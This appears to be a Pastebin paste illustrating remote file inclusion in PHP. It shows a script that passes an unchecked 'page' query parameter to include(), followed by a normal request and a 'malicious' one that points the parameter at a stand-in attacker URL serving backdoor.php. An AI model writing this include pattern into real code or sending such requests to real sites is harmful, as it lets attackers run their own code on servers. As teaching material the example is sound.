Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $tainted_page = $_GET['page'];
- include($tainted_page);
- echo "welcome user";
- ?>
- Regular request:
- www.walla.com/welcome.php?page=login.php
- Malicious request:
- www.walla.com/welcome.php?page=https://www.my-evil-site.com/backdoor.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement